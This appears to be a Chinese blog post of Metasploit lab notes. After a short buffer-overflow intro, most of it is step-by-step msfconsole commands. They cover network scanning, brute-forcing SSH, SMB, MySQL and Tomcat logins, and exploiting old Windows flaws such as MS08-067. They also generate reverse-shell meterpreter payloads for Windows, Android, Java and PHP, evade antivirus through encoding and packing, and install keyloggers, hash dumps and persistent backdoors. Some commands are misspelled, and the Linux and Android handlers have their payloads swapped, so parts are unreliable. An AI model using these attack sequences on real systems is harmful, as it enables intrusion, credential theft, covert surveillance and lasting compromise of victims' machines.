赞
踩
缓冲区溢出的含义是为缓冲区提供了多于其存储容量的数据,就像往杯子里倒入了过量的水一样。
缓冲区可以更抽象地理解为一段可读写的内存区域,
缓冲区攻击的最终目的就是希望系统能执行这块可读写内存中已经被蓄意设定好的恶意代码。
使用安全的字符串操作函数
编写安全代码
输入数据验证(过滤)
指针完整性检查
第三方软件防御
渗透攻击(exploit)
测试者利用系统、程序或服务的漏洞进行攻击的一个过程
攻击载荷(payload)
攻击者在目标系统上执行的一段攻击代码,改代码具有反弹连接,创建用户,执行其他系统命令的功能
shellcode
在目标机器上运行的一段机器指令,成功执行后会返回一个shell
模块(module)
是指metasploit框架中所使用的一段软件代码组件
监听器(listener)
监听器是metasploit中用来等待接入网络连接的组件
开启数据库service postgresql statr
查看数据库状态 service postgresql status
运行msfconsole
查看数据库连接状态 db_connect
创建一个工作台 workspace -a test
删除工作台 workspace - d test
进入test工作台 Wordspace test
使用nmap db_nmap -sS 192.168.80.1 扫描主机
导出扫描结果 db_export 1.xml
导入扫描结果 db_import 1.xml
查看扫描结果 hosts
信息收集
开启msfconsole
use auxiliary/scanner/ip/ipidseq #IPID序列扫描器,与nmap的-sI -O选项类似
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run
nmap连接数据库扫描
db_nmap -sS -A 192.168.2.123
db_services 查看扫描结果
使用portscan模块
search postscan
use auxiliary/scanner/postscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run
特定扫描 smb_version模块:
use auxiliary/scanner/smb/smb_version 查找开启445端口的ip
show options
set RHOSTS 192.168.1.111
set THREADS 50
run
db_hosts -c address,os_flavor
找mssql主机
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
搜索网站中的e-mail地址
search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com (扫描域名)
run
ssh服务器扫描
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
telnet服务
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
ftp主机扫描
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
扫ftp匿名登陆
use auxiliary/scanner/ftp/anonymos
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
ftp匿名登陆
登陆名称:anonymous
密码:空
扫描局域网中有哪些主机存活
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
扫网站目录(并不会扫描文件)
use auxiliary/scanner/http/dir_scanner
show options
set RHOSTS 192.168.1.129
set THREADS 50
run
扫描SNMP主机
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
嗅探抓包
use auxiliary/sniffer/psnuffle
run
密码爆破
ssh密码
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit
telnet密码
search telnet_login
use auxiliray/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set FILE_PATH pass
set USERNAME administrator
exploit
samba攻击
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit
mysql密码爆破
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit
search postgresql_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit
tomcat攻击
search tomcat_mgr_login
show options
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit
漏洞利用模块
show targets 显示目标(os版本)
set TARGET 设置目标版本
exploit 开始漏洞攻击
session -l 列出会话
session -i 选择会话
session -k 结束会话
z 把会话放到后台
c 结束会话
show auxiliary 显示辅助模块
use 使用辅助模块
set 设置选项
run 运行模块
ms10_002
search ms10_002
use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.2.128 (生成恶意网址的IP(可以代理))
set payload windows/meterpreter/reverse_tcp (反弹shell)
set SRVPORT 80 (反弹回来的端口)
set URIPATH /
set LHOST 192.168.2.128 (用于监听的地址)
set LPORT 1211 (用于监听的端口)
exploit
sessions -i (查看是否存在会话)
sessions -i 1 (选择一个ID,进入会话)
直接输入shell 即可得到shell
ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit
sessions -i (查看是否存在会话)
sessions -i 1 (选择一个ID,进入会话)
因为payload的不同,所以这个直接进入了shell
ms12_020
search ms12_020
use auxiliary/scanner/rdb/ms12_020_check (检查是否存在ms12_020漏洞)
show options
set RHOSTS 192.168.2.0/24
set THREADS 50
back
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run
ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRBHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit
ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show target
set target 34
exploit
shellcode
windows
生成shellcode
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe
监听shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
linux
生成shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer
监听shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
andriod
生成shellcode msfpayload android/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk 监听shellcode msf use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST 192.168.2.133 (地址要一致) set LPORT 1121 将生成得shellcode上传到目标机上 exploit dump_contacts 导出电话 dump_sms 导出信息 Webcam_list 摄像头数目 -i 1 后置摄像头 webcam_snap 拍照 webcam_stream 开启摄像头
java
生成shellcode msfpayload java/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar 监听shellcode msf use exploit/multi/handler set payload java/meterpreter/reverse_tcp set LHOST 192.168.2.133 (地址要一致) set LPORT 1125 将生成得shellcode上传到目标机上 exploit 将生成得cracer.jar运行起来: Java -jar cracer.jar运行起来
php
成shellcode
msfpayload php/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 R > cracer.php
监听shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (地址要一致)
set LPORT 1121
将生成得shellcode上传到目标机上
exploit
shell免杀免杀
使用多重编码免杀
msfpayload windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe
加壳免杀
upx -5 cc.exe
veil免杀
shellter免杀工具
shellcode代码注入工具
在一些正常得工具中,注入一些后门,实现免杀
后渗透
1.生成一个木马
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe
2. 进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set LPORT 1233
exploit
木马在目标机执行
截屏 screenshot 会将生成得图片放到主文件夹
获取系统运行得平台 sysinfo
获取键盘记录
keyscan_start 开始
keyscan_dump 输出
keyscan_stop 结束
ps查看进程
migrate 1774切换进程 (在成功得入侵到目标机上第一件事就是要切换到稳定得进程,这样即便程序被关闭,也会进行控制)
run post/windows/capture/keylog_recorder 记录键盘记录
获取hash----hashdump
利用hash登陆
use exploit/windwows/smb/psexec
set payload windwos/metpreter/reverse_tcp
set LHOST 192.168.2.133
SET RHOST 192.168.2.131 (目标)
show options
set LPORT 1212
set SMBUser administrator 获取hash中都可以得到这些数值 smbuser smbpass
set SMBPass asdasdqwsda1313
show options
exploit
进程迁移 run post/windows/manage/migrate (自行切换到稳定进程)
run killav 关闭cmd.exe
查看目标机所有流量 run packetrecorder -i 1
提取系统信息 run scraper
持久控制PC机 (开机自启)
run persistence -X -i 50 -p 1121 -r 192.168.2.133 (往目标得注册表里写入某些数据)
msfcosole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
session -u 2 升级shell变成meterpreter
永久控制服务器
msfpaylaod windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1127 X > /root/cracer.exe
生成得payload放到目标机上
msfcosole
use exploit/multi/handler
set payload windows/meterpreter/metsvc_bin_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
运行payload
run metsvc -A //安装永久后门
重启后
msfcosole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.2.132
set LPORT 31337 //固定得端口
exploit
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。